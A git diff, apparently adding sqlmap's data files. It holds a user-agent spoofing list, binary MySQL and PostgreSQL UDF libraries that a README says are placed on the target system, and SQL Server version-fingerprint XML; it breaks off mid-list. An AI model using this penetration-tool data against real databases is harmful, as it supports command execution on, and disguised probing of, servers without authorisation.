6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN) AppleWebKit/533+ (KHTML, like Gecko) +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ + +# https://techblog.willshouse.com/2012/01/03/most-common-user-agents/ (Note: Updated December 28th 2020) + +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 +Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66 +Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.320 +Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 +Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0 +Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284 diff --git a/src/sqlmap-master/data/txt/wordlist.tx_ b/src/sqlmap-master/data/txt/wordlist.tx_ new file mode 100644 index 0000000..f2b52c9 Binary files /dev/null and b/src/sqlmap-master/data/txt/wordlist.tx_ differ diff --git a/src/sqlmap-master/data/udf/README.txt b/src/sqlmap-master/data/udf/README.txt new file mode 100644 index 0000000..5cecd99 --- /dev/null +++ b/src/sqlmap-master/data/udf/README.txt @@ -0,0 +1,4 @@ +Binary files in this folder are data files used by sqlmap on the target +system, but not executed on the system running sqlmap. They are licensed +under the terms of the GNU Lesser General Public License and their source +code is available on https://github.com/sqlmapproject/udfhack. diff --git a/src/sqlmap-master/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/src/sqlmap-master/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ new file mode 100644 index 0000000..bfd4440 Binary files /dev/null and b/src/sqlmap-master/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/src/sqlmap-master/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ new file mode 100644 index 0000000..1992ed0 Binary files /dev/null and b/src/sqlmap-master/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/src/sqlmap-master/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ new file mode 100644 index 0000000..bb8ec36 Binary files /dev/null and b/src/sqlmap-master/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ diff --git a/src/sqlmap-master/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/src/sqlmap-master/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ new file mode 100644 index 0000000..97799b6 Binary files /dev/null and b/src/sqlmap-master/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..33dbdee Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..c56d766 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..3fb236e Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..d734fff Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..da50fa8 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..83732d3 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..ee1ca8c Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..ab7e745 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..5314a0a Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..da9d0a7 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..1100ab8 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..f9396a8 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..21bbddc Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..9327b1c Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..a987444 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..e4b124f Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..2c22afa Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..ab23ee6 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..8dae29c Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..e5d05fc Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..ff31df6 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..d5576fd Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..2350427 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..eae84bd Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/src/sqlmap-master/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ new file mode 100644 index 0000000..4a408a1 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/src/sqlmap-master/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ new file mode 100644 index 0000000..40f838b Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/src/sqlmap-master/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ new file mode 100644 index 0000000..a9b4b48 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/src/sqlmap-master/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ new file mode 100644 index 0000000..06aee54 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ diff --git a/src/sqlmap-master/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/src/sqlmap-master/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ new file mode 100644 index 0000000..67b5d34 Binary files /dev/null and b/src/sqlmap-master/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ diff --git a/src/sqlmap-master/data/xml/banner/generic.xml b/src/sqlmap-master/data/xml/banner/generic.xml new file mode 100644 index 0000000..fc2fb97 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/generic.xml @@ -0,0 +1,177 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/mssql.xml b/src/sqlmap-master/data/xml/banner/mssql.xml new file mode 100644 index 0000000..f3d5ece --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/mssql.xml @@ -0,0 +1,4245 @@ + + + + + + 10.50.2418 + + + 1 CTP + + + + + 10.50.1797 + + + 0+Cumulative Update 8 + + + + + 10.50.1790 + + + 0+Q2494086 + + + + + 10.50.1777 + + + 0+Cumulative Update 7 + + + + + 10.50.1765 + + + 0+Cumulative Update 6 + + + + + 10.50.1753 + + + 0+Cumulative Update 5 + + + + + 10.50.1746 + + + 0+Cumulative Update 4 + + + + + 10.50.1734 + + + 0+Cumulative Update 3 + + + + + 10.50.1720 + + + 0+Cumulative Update 2 + + + + + 10.50.1702 + + + 0+Cumulative Update 1 + + + + + 10.50.1600.1 + + + 0 + + + + + 10.50.1450.3 + + + 0 + + + + + + + 10.00.4311 + + + 2+Q2494094 + + + + + 10.00.4285 + + + 2+Cumulative Update 4 + + + + + 10.00.4279 + + + 2+Cumulative Update 3 + + + + + 10.00.4272 + + + 2+Cumulative Update 2 + + + + + 10.00.4266 + + + 2+Cumulative Update 1 + + + + + 10.00.4000 + + + 2 + + + + + 10.00.2841 + + + 1+Q2494100 + + + + + 10.00.2821 + + + 1+Cumulative Update 14 + + + + + 10.00.2816 + + + 1+Cumulative Update 13 + + + + + 10.00.2808 + + + 1+Cumulative Update 12 + + + + + 10.00.2804 + + + 0+Q2413738 + + + + + 10.00.2799 + + + 1+Cumulative Update 10 + + + + + 10.00.2789 + + + 1+Cumulative Update 9 + + + + + 10.00.2775 + + + 1+Cumulative Update 8 + + + + + 10.00.2766 + + + 1+Cumulative Update 7 + + + + + 10.00.2760 + + + 0+Q978839 + + + + + 10.00.2758 + + + 1+Q978791 + + + + + 10.00.2757 + + + 1+Cumulative Update 6 + + + + + 10.00.2746 + + + 1+Cumulative Update 5 + + + + + 10.00.2740 + + + 0+Q976761 + + + + + 10.00.2734 + + + 1+Cumulative Update 4 + + + + + 10.00.2723 + + + 1+Cumulative Update 3 + + + + + 10.00.2714 + + + 1+Cumulative Update 2 + + + + + 10.00.2712 + + + 0+Q970507 + + + + + 10.00.2710 + + + 1+Cumulative Update 1 + + + + + 10.00.2531 + + + 1 + + + + + 10.00.1835 + + + 0+Cumulative Update 10 + + + + + 10.00.1828 + + + 0+Cumulative Update 9 + + + + + 10.00.1823 + + + 0+Cumulative Update 8 + + + + + 10.00.1818 + + + 0+Q973601 + + + + + 10.00.1812 + + + 0+Cumulative Update 6 + + + + + 10.00.1806 + + + 0+Cumulative Update 5 + + + + + 10.00.1798 + + + 0+Cumulative Update 4 + + + + + 10.00.1787 + + + 0+Cumulative Update 3 + + + + + 10.00.1779 + + + 0+Q958186 + + + + + 10.00.1771 + + + 0+Q958611 + + + + + 10.00.1763 + + + 0+Q956717 + + + + + 10.00.1755 + + + 0+Q957387 + + + + + 10.00.1750 + + + 0+Q956718 + + + + + 10.00.1600.22 + + + 0 + + + + + 10.00.1300.13 + + + February CTP + + + + + 10.00.1049.14 + + + July CTP + + + + + 10.00.1019.17 + + + June CTP + + + + + + + 9.00.5292 + + + 4+Q2494123 + + + + + 9.00.5266 + + + 4 Cumulative Update 3 + + + + + 9.00.5254 + + + 4 Cumulative Update 1 + + + + + 9.00.5000 + + + 4 + + + + + 9.00.4912 + + + 4 CTP + + + + + 9.00.4340 + + + 3+Q2494112 + + + + + 9.00.4325 + + + 3+Q2438344 + + + + + 9.00.4315 + + + 3+Q2438344 + + + + + 9.00.4311 + + + 3+Q2345449 + + + + + 9.00.4309 + + + 3+Q2258854 + + + + + 9.00.4305 + + + 3+Q983329 + + + + + 9.00.4294 + + + 3+Q980176 + + + + + 9.00.4285 + + + 3+Q978915 + + + + + 9.00.4278 + + + 